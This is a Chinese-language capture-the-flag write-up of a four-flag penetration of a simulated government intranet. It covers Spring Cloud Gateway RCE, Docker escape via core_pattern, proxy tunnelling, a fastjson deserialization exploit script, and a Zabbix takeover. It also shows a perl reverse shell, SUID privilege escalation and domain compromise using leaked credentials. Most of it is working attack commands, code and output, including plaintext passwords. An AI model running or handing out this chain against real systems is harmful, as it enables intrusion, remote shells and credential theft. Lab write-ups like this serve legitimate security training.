共计 13924 个字符，预计需要花费 35 分钟才能阅读完成。

flag01

上来先进行端口扫描

其中 22 端口和 80 端口没啥用，主要看 8080 端口。
打开后发现是经典的 springboot 报错界面

存在 springboot actuator 泄露

那么直接上 CVE 试试，发现存在 CVE-2022-22947

python 环境有点问题折腾了半天，python27 官方源不行就换清华源吧
https://github.com/0730Nophone/CVE-2022-22947-/blob/main/exp.py

脚本不行就 AI 修改一下或者手动把 print 地方改成 python3

哥斯拉修改一下类型为 Java 就能连接
（这里也可以用工具回显，但是不出网还是得写马）

连上去以后发现.dockerenv 那很明显是 docker 环境了，尝试 docker 逃逸

上传 CDK 收集信息
目标机器不能大文件上传，分块传输

然后合并
cat cdk.* > cdk

CDK (Container DucK)
CDK Version(GitCommit): e8ec183dc9da4968794b3922e6d474ab49215303
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[Information Gathering - System Info]
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/passwd
    /bin/mount
    /bin/ping
    /bin/su
    /bin/umount

[Information Gathering - Services]

[Information Gathering - Commands and Capabilities]
    CapInh: 0000000000000000
    CapPrm: 00000000a80425fb
    CapEff: 00000000a80425fb
    CapBnd: 00000000a80425fb
    CapAmb: 0000000000000000
    Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:

[Information Gathering - Mounts]
0:47 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/6JC6FZQGYKHHL4O2O5VQZ2UEPE:/var/lib/docker/overlay2/l/ZNRTUHIEVJBUG4YHHAI2WF3CGQ:/var/lib/docker/overlay2/l/B7X5DEEX2MIUSMKAMKG66GHM6H:/var/lib/docker/overlay2/l/JZ26UVGDDLBIN2AV5AN2SMQ33Y:/var/lib/docker/overlay2/l/PXVXR6FJH7TBYMIBZZWZL7IYRG:/var/lib/docker/overlay2/l/5F2TSJQ5SBGSANBFCV5FWGDQYB:/var/lib/docker/overlay2/l/IQNAZRWMPNDLUYBKM7OUPGBZ4H:/var/lib/docker/overlay2/l/XJQQDLF67JL4LL4OIHGGMJMDOS,upperdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/diff,workdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/work
0:55 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:56 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:57 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:58 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:30 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:53 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
252:3 /var/lib/docker/containers/52b7e75c01a9f5f22332a1e9ab8308dbef67758a1175a3a9cd00e32e2bbc67bc/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/vda3 rw
252:3 /var/lib/docker/containers/52b7e75c01a9f5f22332a1e9ab8308dbef67758a1175a3a9cd00e32e2bbc67bc/hostname /etc/hostname rw,relatime - ext4 /dev/vda3 rw
252:3 /var/lib/docker/containers/52b7e75c01a9f5f22332a1e9ab8308dbef67758a1175a3a9cd00e32e2bbc67bc/hosts /etc/hosts rw,relatime - ext4 /dev/vda3 rw
0:24 /sys/kernel/core_pattern /host/proc/sys/kernel/core_pattern rw,nosuid,nodev,noexec,relatime - proc proc rw
0:57 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:55 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:56 /null /proc/interrupts rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:56 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:56 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:56 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:61 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:62 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
0:63 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro,inode64

[Information Gathering - Net Namespace]
    container net namespace isolated.

[Information Gathering - Sysctl Variables]

[Information Gathering - DNS-Based Service Discovery]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 100.100.2.138:53: read udp 172.17.0.2:44425->100.100.2.138:53: i/o timeout
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 100.100.2.138:53: read udp 172.17.0.2:58645->100.100.2.138:53: i/o timeout

[Discovery - K8s API Server]
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
    api-server forbids anonymous request.
    response:

[Discovery - K8s Service Account]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[Discovery - Cloud Provider Metadata API]
    Alibaba Cloud Metadata API available in http://100.100.100.200/latest/meta-data/
    Docs: https://help.aliyun.com/knowledge_detail/49122.html

[Exploit Pre - Kernel Exploits]
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[Information Gathering - Sensitive Files]
    .dockerenv - /.dockerenv
    /.bashrc - /etc/skel/.bashrc
    /.bashrc - /root/.bashrc

[Information Gathering - ASLR]

[Information Gathering - Cgroups]
    0::/

[Information Gathering - Container Security]
    cgroup: NOT isolated (shared with host, cgroup:[4026532308])
    ipc: NOT isolated (shared with host, ipc:[4026532306])
    mnt: NOT isolated (shared with host, mnt:[4026532304])
    net: NOT isolated (shared with host, net:[4026532309])
    pid: NOT isolated (shared with host, pid:[4026532307])
    uts: NOT isolated (shared with host, uts:[4026532305])
2026/03/25 02:06:59 current dir: /tmp
2026/03/25 02:06:59 current user: root uid: 0 gid: 0 home: /root
2026/03/25 02:06:59 hostname: 52b7e75c01a9
2026/03/25 02:06:59 debian debian 10.9 kernel: 5.15.0-144-generic
2026/03/25 02:06:59 Setuid files found:
2026/03/25 02:06:59 service found in process:
    1   0   java
2026/03/25 02:06:59 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
2026/03/25 02:06:59 available commands:
    curl,wget,find,java,apt,dpkg,capsh,mount,fdisk,base64,perl
2026/03/25 02:06:59 net.ipv4.conf.all.route_localnet = 0
2026/03/25 02:07:39 checking if api-server allows system:anonymous request.
2026/03/25 02:07:40 failed to dial Volcano Engine (Volcengine) API.
2026/03/25 02:07:41 failed to dial Azure API.
2026/03/25 02:07:42 failed to dial Google Cloud API.
2026/03/25 02:07:43 failed to dial Tencent Cloud API.
2026/03/25 02:07:44 failed to dial OpenStack API.
2026/03/25 02:07:45 failed to dial Amazon Web Services (AWS) API.
2026/03/25 02:07:46 failed to dial ucloud API.
2026/03/25 02:07:46 refer: https://github.com/mzet-/linux-exploit-suggester
2026/03/25 02:07:49 /proc/sys/kernel/randomize_va_space file content: 2
2026/03/25 02:07:49 ASLR is enabled.
2026/03/25 02:07:49 /proc/1/cgroup file content:
2026/03/25 02:07:49 /proc/self/cgroup file added content (compare pid 1) :
2026/03/25 02:07:49 Namespace isolation status:
2026/03/25 02:07:49 Seccomp: filter mode (2)
2026/03/25 02:07:49 Seccomp: kernel supports Seccomp
2026/03/25 02:07:49 SELinux: not detected (no selinuxfs)
2026/03/25 02:07:49 AppArmor: kernel config not available
2026/03/25 02:07:49 AppArmor: no explicit AppArmor boot parameter found
2026/03/25 02:07:49 AppArmor: module is enabled (runtime)
2026/03/25 02:07:49 AppArmor: container profile: docker-default (enforce)
/tmp >

发现 0:24 /sys/kernel/core_pattern /host/proc/sys/kernel/core_pattern rw,nosuid,nodev,noexec,relatime - proc proc rw
通过修改 core_pattern 实现宿主机命令执行：

# 创建 SSH 目录
./cdk run mount-procfs /host/proc/ "mkdir /root/.ssh/"

# 写入公钥
./cdk run mount-procfs /host/proc/ 'echo ssh-rsa [公钥内容] > /root/.ssh/authorized_keys'

逃逸成功（这边建议使用 xshell 生成和进入，其他的也行就是有点麻烦）

拿下初步立柱点就要开始为持久化和横向渗透准备了
先交第一个 flag

flag02

然后收集一下网段信息

root@platform:/tmp# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::80df:85ff:fe60:c844  prefixlen 64  scopeid 0x20<link>
        ether 82:df:85:60:c8:44  txqueuelen 0  (Ethernet)
        RX packets 5347  bytes 14731428 (14.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7534  bytes 4498661 (4.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.22.12  netmask 255.255.255.0  broadcast 172.16.22.255
        inet6 fe80::216:3eff:fe06:ae32  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:06:ae:32  txqueuelen 1000  (Ethernet)
        RX packets 350181  bytes 35030332 (35.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 349796  bytes 35010761 (35.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3429  bytes 251493 (251.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3429  bytes 251493 (251.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

vethd557174: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::6c6e:36ff:fe82:bcdf  prefixlen 64  scopeid 0x20<link>
        ether 6e:6e:36:82:bc:df  txqueuelen 0  (Ethernet)
        RX packets 5347  bytes 14806286 (14.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7549  bytes 4499807 (4.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

依旧 fscan 爆扫

root@platform:/tmp# ./fscan -h 172.16.22.12/24

   ___                              _    
  / _      ___  ___ _ __ __ _  ___| | __ 
 / /_/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\_______  (__| | | (_| | (__|   <    
____/     |___/___|_|  __,_|___|_|_   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.16.22.12    is alive
(icmp) Target 172.16.22.14    is alive
(icmp) Target 172.16.22.41    is alive
(icmp) Target 172.16.22.88    is alive
(icmp) Target 172.16.22.253   is alive
[*] Icmp alive hosts len is: 5
172.16.22.41:445 open
172.16.22.41:139 open
172.16.22.12:22 open
172.16.22.88:22 open
172.16.22.14:22 open
172.16.22.41:135 open
172.16.22.88:80 open
172.16.22.14:80 open
172.16.22.12:80 open
172.16.22.88:8080 open
172.16.22.12:8080 open
172.16.22.41:88 open
[*] alive ports len is: 12
start vulscan
[*] WebTitle http://172.16.22.12       code:200 len:10032  title: 政务服务平台 - 门户与办事大厅
[*] NetInfo 
[*]172.16.22.41
   [->]DC
   [->]172.16.22.41
[*] WebTitle http://172.16.22.88       code:200 len:4531   title: 政务内网资源下载
[*] NetBios 172.16.22.41    [+] DC:ZWFWDC                 
[*] WebTitle http://172.16.22.14       code:200 len:10671  title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.16.22.88:8080  code:404 len:306    title:None

其中政务内网资源下载看起来很有意思，这里为了后面方便搭建代理就使用 stoaway。
这里只能正向连接

 靶机：./linux_x64_agent -c 10020
主机: ./linux_x64_admin -c 8.130.79.10:10020

然后就可以访问内网

下载 apk 后就是 RE 手干的活了
这里就简单说下请求数据包的加密逻辑在 com.example.Mobile.MainActivity 方法中
这里要打 fastjson 反序列化

import base64  
import os  
import json  
import requests  
from cryptography.hazmat.primitives import serialization, hashes  
from cryptography.hazmat.primitives.asymmetric import padding  
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes  
from cryptography.hazmat.backends import default_backend  

# ===== 配置信息 =====SERVER_URL = "http://172.16.22.88:8080/api/login"  

# 代理配置 (格式: http://proxy_ip:port 或 https://proxy_ip:port)# 如果不需要代理，请将其设置为 NonePROXY = "socks5://123.207.100.93:10010"  # 修改此行为您的代理地址，或设为 None  
# Java 代码中的 RSA 公钥（Base64 格式）PUBLIC_KEY_B64 = ("MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnKum2FOeaPQumhLBpRauv+OMB6pkdqACjbZYkzzP8CZgjwEwmKauXLxzur1beldNDlVnUs83CnnvanPIYW3oP56t0SoqDmWviBTBJ2aCjtrztFYjBixZEYJ2Exp9f6cdFuSMiucPyuhwY8AuFWnGPJ3Mwt8L8ouV9Lc6Ptp67fCZ0aHr1BVu+pXvHVktbcmeCt+61dnyd9iXTDZfIQ9rwrDsTlkEYORN0hckpFWvgaoNXhXm60ioLkk/qtPZSjir0bpDL0w0iZ3+wRJLtUOe3KyGx+C00S5w2cM0Zw1XlmRQ08yj1nObVkaVsfEU8sSk/XFVnuCrO9YfQCa1uxm5ZQIDAQAB")  

# ===== 1. 要发送的 JSON 明文 =====plaintext = """{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://172.16.22.12:50388/7862c7","autoCommit": true}"""  

print(plaintext)  

# ===== 2. 生成随机 AES key (128-bit) =====aes_key = os.urandom(16)  

# ===== 3. AES/GCM 加密 =====iv = os.urandom(12)  # 12 字节 IVencryptor = Cipher(algorithms.AES(aes_key),  
    modes.GCM(iv),  
    backend=default_backend()).encryptor()  

ciphertext = encryptor.update(plaintext.encode("utf-8")) + encryptor.finalize()  
tag = encryptor.tag  

# Body = IV + 密文 + GCM tagbody_raw = iv + ciphertext + tag  
body_b64 = base64.b64encode(body_raw).decode("utf-8")  

# ===== 4. 用 RSA 公钥加密 AES key =====pub_bytes = base64.b64decode(PUBLIC_KEY_B64)  
public_key = serialization.load_der_public_key(pub_bytes, backend=default_backend())  

enc_key = public_key.encrypt(  
    aes_key,  
    padding.PKCS1v15())  
enc_key_b64 = base64.b64encode(enc_key).decode("utf-8")  

# ===== 5. 准备请求参数 =====headers = {  
    "Content-Type": "application/octet-stream",  
    "X-Encrypted-Key": enc_key_b64,  
}  

request_kwargs = {  
    "url": SERVER_URL,  
    "data": body_b64.encode("utf-8"),  
    "headers": headers,  
    "timeout": 10  
}  

# 如果指定了代理，则添加到请求参数中  
if PROXY:  
    request_kwargs["proxies"] = {  
        "http": PROXY,  
        "https": PROXY  
    }  
    print(f"[INFO] 使用代理: {PROXY}")  
else:  
    print("[INFO] 未使用代理")  

# ===== 6. 发送 POST 请求 =====try:  
    resp = requests.post(**request_kwargs)  
    print("Status:", resp.status_code)  
    print("Response:", resp.text)  
except requests.exceptions.ProxyError as e:  
    print(f"[ERROR] 代理连接失败: {e}")  
except requests.exceptions.RequestException as e:  
    print(f"[ERROR] 请求发生错误: {e}")

python3 encrypt_login.py --json '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:50388/7862c7","autoCommit":true}'

然后哥斯拉连接，密码在 java chains 里面看

拿到第二个 flag

flag03

172.16.22.14 有个 zabbix

这里需要你自己挂代理目录爆破

尝试弱口令进入后台 Admin/zabbix

使用自带的命令执行反弹 shell

perl -e 'use Socket;$i="172.16.22.12";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

成功拿到 shell

尝试获取 flag 权限不够

还得提权
find / -perm -4000 -type f 2>/dev/null
发现 ss

ss -a -F /path/to/input-file

flag04

继续横向发现配置了域用户

但是看不到密码，而 ss 指令只能回显第一行内容，所以我们需要寻找其他利用点
既然有 zabbix 那肯定有数据库，看看能不能连上去，试下发现数据库是弱口令
zabbix/password
mysql -uzabbix -ppassword -e "select * from zabbix.userdirectory_ldapG"

唉卧槽，这靶机太复杂了，一个人给我打力竭了

后面域渗透切换到 kali，先配置一下 proxychains
proxychains4 bloodhound-ce-python -u ldapadmin -p XpVLGkQHm8 -d zwfw.com -dc DC.zwfw.com -ns 172.16.22.41 -c all --auth-method ntlm --dns-tcp --zip

INFO: Found 35 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.zwfw.com

通过 BloodHoud 工具导入进行分析，发现可以使用域用户 ldapadmin 凭据，通过 WinRM 可以登录到 DC，在注册表中，发现域管密码：administrator / a4Z6FcRYSp6LLSGO

proxychains -q nxc smb 172.16.22.41 -u administrator -p a4Z6FcRYSp6LLSGO --codec GBK -x 'type C:UsersAdministratorDesktopflag.txt'
拿到 flag